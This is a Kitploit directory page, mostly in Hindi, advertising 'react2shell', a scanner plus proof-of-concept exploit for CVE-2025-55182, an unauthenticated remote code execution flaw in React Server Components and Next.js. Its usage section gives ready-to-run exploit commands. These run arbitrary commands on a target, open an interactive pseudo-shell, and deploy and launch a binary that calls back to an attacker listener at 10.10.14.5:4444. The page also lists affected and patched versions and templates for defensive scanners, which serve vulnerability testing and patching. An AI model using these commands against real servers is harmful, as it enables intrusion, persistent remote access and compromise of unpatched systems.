Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-react2shell — Next.js अनुप्रयोगों में CVE-2025-55182 भेद्यता का पता लगाने के लिए एक bash स्कैनर। और एक PoC nodejs स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/saturate/cve-2025-55182-react2shell
भेद्यता स्कैनरशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub
saturate/cve-2025-55182-react2shell

CVE-2025-55182-react2shell

Next.js अनुप्रयोगों में CVE-2025-55182 भेद्यता का पता लगाने के लिए एक bash स्कैनर। और एक PoC nodejs स्क्रिप्ट।

रिपॉजिटरी देखें
111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

react2shell

CVE-2025-55182 टूलकिट। Next.js में RSC पेलोड इंजेक्शन के माध्यम से अप्रमाणित RCE के लिए स्कैनर + शोषण।

Node.js शोषण: शून्य निर्भरताएँ। Bash स्कैनर: एकल URL या बल्क सूचियों की जाँच करता है।

शोषण

root@kitploit:~
# Single command with output
./react2shell.mjs -t http://target:3000 -c "id"

# Interactive pseudo-shell
./react2shell.mjs -t http://target:3000 -i

# Deploy a binary to the target (download + chmod + execute detached)
./react2shell.mjs -t http://target:3000 \
  --deploy ./my-agent \
  --remote-args "-H 10.10.14.5 -p 4444 --tls --cron"
root@kitploit:~
Options:
  -t, --target <url>       Target URL (required)
  -c, --command <cmd>      Execute command with output
  --blind                  Blind RCE (no output capture)
  -i, --interactive        Interactive pseudo-shell
  --deploy <binary>        Upload and execute a binary on the target
  --lhost <ip>             Your IP (auto-detected if omitted)
  --serve-port <port>      HTTP port to serve the binary (default: 8888)
  --remote-args <args>     Arguments passed to the deployed binary

--deploy चार RCE कॉल को श्रृंखलित करता है: प्लेटफ़ॉर्म का पता लगाना (), बाइनरी डाउनलोड (एक अस्थायी HTTP सर्वर बनाता है, लक्ष्य पर / का उपयोग करता है), और एक डिटैच किया गया ताकि प्रक्रिया 5-सेकंड टाइमआउट से बच जाए।

uname
curl
wget
spawn
execSync

नोट: लक्ष्य पृष्ठ गतिशील होना चाहिए (force-dynamic या एक गैर-कैशेबल रूट)। स्थिर/प्रीरेंडर किए गए पृष्ठ कैश्ड डाइजेस्ट लौटाते हैं बजाय पेलोड निष्पादित करने के।

स्कैनर

root@kitploit:~
chmod +x cve-2025-55182-check.sh

# Scan a single URL
./cve-2025-55182-check.sh https://example.com

# Scan multiple URLs
./cve-2025-55182-check.sh -f urls.txt

# JSON output
./cve-2025-55182-check.sh --json https://example.com
root@kitploit:~
Options:
  -f, --file FILE         Read URLs from file (one per line)
  -v, --verbose           Verbose output (show curl details)
  -q, --quiet             Quiet mode (only show vulnerable sites)
  -n, --no-follow         Don't follow redirects
  -t, --timeout SECONDS   Request timeout (default: 10)
  --json                  Output results in JSON format
  --validate-fix          Test for mitigation controls
  --single-payload        Use only the basic payload (faster)

एकीकरण टेम्पलेट

templates/ में सुरक्षा उपकरणों के लिए टेम्पलेट:

  • Nuclei (templates/nuclei.yaml)
  • Burp Suite (templates/burp-scanner.json)
  • OWASP ZAP (templates/zap-scan-policy.xml)

प्रभावित संस्करण

React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 Next.js: >=14.3.0-canary.77, सभी 15.x और 16.x (पैच से पहले)

पैच किए गए: React 19.0.1+, 19.1.2+, 19.2.1+ Next.js 16.0.7+, 15.5.7+, 15.4.8+, 15.3.6+, 15.2.6+, 15.1.9+, 15.0.5+

तकनीकी विवरण

पूर्ण शोषण श्रृंखला विश्लेषण के लिए TECHNICAL.md देखें।

संदर्भ

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55182
  • React सलाह: https://react.dev/blog/2025/12/03/critical-security-vulnerability
  • फिक्स कमिट: https://github.com/facebook/react/commit/7dc903cd29

लाइसेंस

MIT

लेखक

Allan Kimmer Jensen - https://akj.io

टूल डाउनलोड करें